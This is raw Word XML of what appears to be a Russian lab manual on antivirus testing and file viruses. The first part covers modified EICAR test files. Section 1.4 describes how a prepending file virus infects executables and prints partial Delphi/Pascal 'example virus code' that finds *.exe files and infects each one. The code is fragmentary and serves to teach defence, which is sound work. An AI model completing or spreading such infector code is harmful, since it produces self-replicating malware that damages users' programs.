    <w:p w14:paraId="7BF319BE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F8D11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1.2.6 Создать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ERRO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>. Файл создается в текстовом редакторе путем добавления в начало вируса символов “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ERRO</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0C54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-” и сохранения файла с расширением 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0C54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. При сканировании такого файла, антивирус обнаружит ошибку при анализе его содержимого (например, при нарушении целостности при проверке многотомного архива). Такой файл признается условно чистым.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13438ACA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130110C" w14:textId="77C721B5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58748" wp14:editId="10430FF0">
            <wp:extent cx="5943600" cy="848995"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="4" name="Рисунок 4" descr="ERRO-E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-EIC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AC89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9DFEE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Рис. 9. Модификация вируса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ERRO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</w:p>
    <w:p w14:paraId="54609755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A8AF9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1.2.7 Создать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SUSP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>. Файл создается в текстовом редакторе путем добавления в начало вируса символов “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SUSP</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0C54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-” и сохранения файла с расширением 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0C54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. При сканировании такого файла антивирус считает его подозрительным, а именно зараженным неизвестным вирусом. Такой файл должен быть помещен на карантин или удален.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD225EE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806137F" w14:textId="12BCE9F6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3A52D" wp14:editId="404E310F">
            <wp:extent cx="5943600" cy="848995"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="3" name="Рисунок 3" descr="SUSP-E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SP-EIC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C8AD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D7102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Рис. 10. Модификация вируса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SUSP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</w:p>
    <w:p w14:paraId="3E15439A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F37AC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1.2.8 Создать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WARN</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0C54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-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3D0C54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Файл создается в текстовом редакторе путем добавления в начало вируса символов “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WARN</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0C54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-” и сохранения файла с расширением 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0C54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Такой файл также признается подозрительным, но не неизвестным вирусом, а модификацией известного.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38979B53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B2E90D3" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1128"/>
          <w:tab w:val="num" w:pos="0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>Сохранить отчет с результатами работы антивируса в текстовый файл. Для этого в главном окне программы выбрать раздел «Защита» и в нем контейнер «Статистика»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3476C80B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51C39" w14:textId="5FFDF3B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4AF41" wp14:editId="3B0C3FF2">
            <wp:extent cx="5943600" cy="4375785"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="2" name="Рисунок 2" descr="Статискика_глав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атискика_главн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276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1B4D8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Рис. 11. Выбор контейнера «Статистика» в главном окне программы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F3A35A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E8837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В окне «Защита» нажать кнопку «Сохранить как» и сохранить отчет в текстовый файл</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4C7B9F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F7433" w14:textId="0CCCAE4E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940669" wp14:editId="54138B1D">
            <wp:extent cx="5943600" cy="4702810"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="1" name="Рисунок 1" descr="Статистика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татистика_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C908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1FF2B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Рис. 12. Статистика обнаружения вирусов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD6BE22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8E9F4" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="74441A0B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>1.4. Изучение механизма работы файловых вирусов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A8011E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FD61C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Файловые вирусы записывают свое тело в файл-жертву и используют различные механизмы получения управления с целью выполнения деструктивных функций и дальнейшего распространения. Один из способов заключается в добавлении тела вируса в начало файла-жертвы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F05AD8A" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0C5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Изначально вирус существует сам по себе. Пусть тем или иным образом он был запущен на выполнение. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DF57E8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Вирус ищет файл-жертву. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3C31C8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Переименовывает его, задавая ему случайное имя. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364E789C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Создает новый файл в том же каталоге с исходным именем файла-жертвы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B75BFED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Открывает для чтения свой исполняемый файл</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F50DD55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Записывает в файл, созданный на шаге 3 свой код</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C47F800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Открывает для чтения файл-жертву, переименованный на шаге 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4001BDB0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Дозаписывает в файл, созданный на шаге 3 код файла-жертвы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD6F0CA" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0C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Удаляет исходный файл жертвы, переименованный на шаге 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E045C8" w14:textId="77777777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1DFAD" w14:textId="13423098" w:rsidR="003D0C54" w:rsidRPr="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0C54">
      <w:pPr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79D5CC1" wp14:editId="5D013B06">
                <wp:extent cx="5829300" cy="2514600"/>
                <wp:effectExtent l="0" t="0" r="0" b="127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314" y="342825"/>
                            <a:ext cx="1257348" cy="1486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0909E" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0C54">
                              <w:r>
                                <w:t>Файл-жертва</w:t>
                              </w:r>
                            </w:p>
                            <w:p w14:paraId="3278DE35" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="00454DF3" w:rsidRDefault="003D0C54" w:rsidP="003D0C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Notepad.exe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100" y="342825"/>
                            <a:ext cx="1257348" cy="456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50C9B" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0C54">
                              <w:pPr>
                                <w:jc w:val="center"/>
                              </w:pPr>
                              <w:r>
                                <w:t>ВИРУС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42919" y="342825"/>
                            <a:ext cx="1257348" cy="1942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42919" y="342825"/>
                            <a:ext cx="1257348" cy="456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3CFD1" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0C54">
                              <w:pPr>
                                <w:jc w:val="center"/>
                              </w:pPr>
                              <w:r>
                                <w:t>ВИРУС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42919" y="799653"/>
                            <a:ext cx="1257348" cy="1485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C6B91" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0C54">
                              <w:r>
                                <w:t>Файл-жертва</w:t>
                              </w:r>
                            </w:p>
                            <w:p w14:paraId="70777A68" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="00454DF3" w:rsidRDefault="003D0C54" w:rsidP="003D0C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Notepad.exe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9D5CC1" id="Полотно 18" o:spid="_x0000_s1026" editas="canvas" style="width:459pt;height:198pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="58293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5146;visibility:visible;mso-wrap-style:square">
                  <v:fill o:detectmouseclick="t"/>
                  <v:path o:connecttype="none"/>
                </v:shape>
                <v:rect id="Rectangle 4" o:spid="_x0000_s1028" style="position:absolute;left:2283;top:3428;width:12573;height:1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6CC0909E" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0C54">
                        <w:r>
                          <w:t>Файл-жертва</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="3278DE35" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="00454DF3" w:rsidRDefault="003D0C54" w:rsidP="003D0C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Notepad.exe</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 5" o:spid="_x0000_s1029" style="position:absolute;left:19431;top:3428;width:12573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04B50C9B" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0C54">
                        <w:pPr>
                          <w:jc w:val="center"/>
                        </w:pPr>
                        <w:r>
                          <w:t>ВИРУС</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 6" o:spid="_x0000_s1030" style="position:absolute;left:35429;top:3428;width:12573;height:1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7" o:spid="_x0000_s1031" style="position:absolute;left:35429;top:3428;width:12573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1A23CFD1" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0C54">
                        <w:pPr>
                          <w:jc w:val="center"/>
                        </w:pPr>
                        <w:r>
                          <w:t>ВИРУС</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 8" o:spid="_x0000_s1032" style="position:absolute;left:35429;top:7996;width:12573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6DBC6B91" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0C54">
                        <w:r>
                          <w:t>Файл-жертва</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="70777A68" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="00454DF3" w:rsidRDefault="003D0C54" w:rsidP="003D0C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Notepad.exe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4EB767" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0C54">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DDED62B" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0C54">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3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При запуске инфицированного файла-жертвы вирус выполняется первым и выполняет следующие действия:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CAEAE3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Проверяет размер запущенного файла в байтах.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA1FA4D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Если размер больше размера самого вируса, значит запущен инфицированный файл. Иначе – запущен вирус в исходной форме.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100C5523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Вирус создает файл с двойным расширением *.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0C54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (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0C54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>) в том же каталоге.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442AC840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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Смещается в инфицированном файле в место начала настоящей программы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3851235B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Считывает код программы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0C54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и записывает его в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1BC62750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 xml:space="preserve">Запускает на выполнение файл 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0C54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0C54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1BDEE5F5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Выполняет полезную нагрузку (вредоносные действия)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51289CD4" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="4080"/>
          <w:tab w:val="left" w:pos="1260"/>
          <w:tab w:val="num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Выполняет поиск новых файлов-жертв и их заражение.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E154D08" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0C54">
      <w:p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238E17B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C54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Примерный программный код вируса:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2F00A7" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0C54">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6538DFC1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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>const</w:t>
      </w:r>
      <w:r w:rsidRPr="007D23C0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007D23C0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>virsize</w:t>
      </w:r>
      <w:r w:rsidRPr="007D23C0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=1000; //размер файла-вируса в байтах</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51ECEE31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7AAA0B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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r w:rsidRPr="007D23C0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007D23C0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>victims</w:t>
      </w:r>
      <w:r w:rsidRPr="007D23C0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="007D23C0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TSearchRec</w:t>
      </w:r>
      <w:r w:rsidRPr="007D23C0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>; //структура для поиска файлов-жертв</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DA0C1D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</w:rPr>
        <w:t xml:space="preserve">    f1,f2:file; //файловые переменные</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650F7D24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E40A84B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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>filemode</w:t>
      </w:r>
      <w:r w:rsidRPr="007D23C0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:=0; //режим открытия файла для чтения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31851366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</w:rPr>
        <w:t xml:space="preserve">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assignfile</w:t>
      </w:r>
      <w:r w:rsidRPr="007D23C0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="007D23C0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="007D23C0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1,</w:t>
      </w:r>
      <w:r w:rsidRPr="007D23C0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>paramstr</w:t>
      </w:r>
      <w:r w:rsidRPr="007D23C0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(0)); //связываем переменную </w:t>
      </w:r>
      <w:r w:rsidRPr="007D23C0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="007D23C0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1 с файлом программы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5945F4D6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</w:rPr>
        <w:t xml:space="preserve">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reset</w:t>
      </w:r>
      <w:r w:rsidRPr="007D23C0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="007D23C0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="007D23C0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1,1); //открываем файл для чтения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCEAC34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</w:rPr>
        <w:t xml:space="preserve">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if</w:t>
      </w:r>
      <w:r w:rsidRPr="007D23C0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="007D23C0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>filesize</w:t>
      </w:r>
      <w:r w:rsidRPr="007D23C0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="007D23C0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="007D23C0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1)&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="007D23C0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>virsize</w:t>
      </w:r>
      <w:r w:rsidRPr="007D23C0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="007D23C0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>then</w:t>
      </w:r>
      <w:r w:rsidRPr="007D23C0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> //если это зараженная программа, то выполняем ее</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B12765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</w:rPr>
        <w:t xml:space="preserve">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1414C19" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="00816879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D0C54">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  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go</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0C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//подпрограмма выполнения программы-жертвы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11111F0C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D0C54">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">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end</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0C54">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E0B92B" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="00816879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2114">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">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fileMode</w:t>
      </w:r>
      <w:r w:rsidRPr="00372114">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:=2;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> //режим чтения и записи файлов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402C8E19" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="0037211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8542901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14">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="007D23C0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if FindFirst('*.exe',faAnyFile,victims)=0 then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB5CFA0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23C0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  repeat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEAF2D0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23C0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">     if not ((victims.Name)=extractfilename(paramstr(0))) then begin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C71C630" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="00AE5F29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23C0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      if not ((victims.Name)=extractfilename(extractfilename(paramstr(0)))) then infect(victims.Name); </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE5F29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заражение</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE5F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файла</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE5F29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</w:rPr>
        <w:t>жертвы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CD1B38" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="007D23C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7D23C0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>end;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9A0FE1" w14:textId="77777777" w:rsid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23C0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  until FindNext(victims)&lt;&gt;0;</w:t>
      </w:r>
    </w:p>
